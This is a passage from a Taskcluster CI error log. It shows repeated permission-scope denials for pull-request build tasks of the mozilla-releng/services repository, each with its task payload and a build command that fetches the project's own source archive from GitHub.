https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:45:00.292Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:45:00.292Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"cewceEfSSlGZUz5a2sklRw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:45:00.292Z\\\"\\n}\\n  time:     2016-09-23T12:45:00.506Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"IPg09aDOR3GXMdGHwn_uog\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_frontend\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"2149d5ac7a1dc167892552ade57e1e8bec490f1c\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:45:00.292Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:45:00.292Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"cewceEfSSlGZUz5a2sklRw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:45:00.292Z\\\"\\n}\\n  time:     2016-09-23T12:45:00.506Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"IPg09aDOR3GXMdGHwn_uog\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_frontend\",\n                        \"description\": \"Test, build and deploy releng_frontend\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_frontend\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"2149d5ac7a1dc167892552ade57e1e8bec490f1c\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T12:45:00.292Z\",\n                    \"deadline\": \"2016-09-24T12:45:00.292Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"cewceEfSSlGZUz5a2sklRw\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T12:45:00.292Z\"\n                },\n                \"time\": \"2016-09-23T12:45:00.506Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"F0oobWZ6R8mvfy6i4oFhVw\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_docs\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_docs\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_docs\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"2149d5ac7a1dc167892552ade57e1e8bec490f1c\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:45:00.292Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:45:00.292Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"cewceEfSSlGZUz5a2sklRw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:45:00.292Z\\\"\\n}\\n  time:     2016-09-23T12:45:00.511Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"F0oobWZ6R8mvfy6i4oFhVw\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_docs\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_docs\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_docs\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"2149d5ac7a1dc167892552ade57e1e8bec490f1c\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:45:00.292Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:45:00.292Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"cewceEfSSlGZUz5a2sklRw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:45:00.292Z\\\"\\n}\\n  time:     2016-09-23T12:45:00.511Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"F0oobWZ6R8mvfy6i4oFhVw\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_docs\",\n                        \"description\": \"Test, build and deploy releng_docs\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_docs\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"2149d5ac7a1dc167892552ade57e1e8bec490f1c\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T12:45:00.292Z\",\n                    \"deadline\": \"2016-09-24T12:45:00.292Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"cewceEfSSlGZUz5a2sklRw\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T12:45:00.292Z\"\n                },\n                \"time\": \"2016-09-23T12:45:00.511Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"DmMdPN1XQqiqaHleX6UgvA\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_dashboard\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_dashboard\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_dashboard\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_dashboard\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"2149d5ac7a1dc167892552ade57e1e8bec490f1c\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:45:00.293Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:45:00.293Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"cewceEfSSlGZUz5a2sklRw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:45:00.293Z\\\"\\n}\\n  time:     2016-09-23T12:45:00.521Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"DmMdPN1XQqiqaHleX6UgvA\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_dashboard\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_dashboard\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_dashboard\\\"\\n  },\\n  \\\"scopes\\\": [\\n    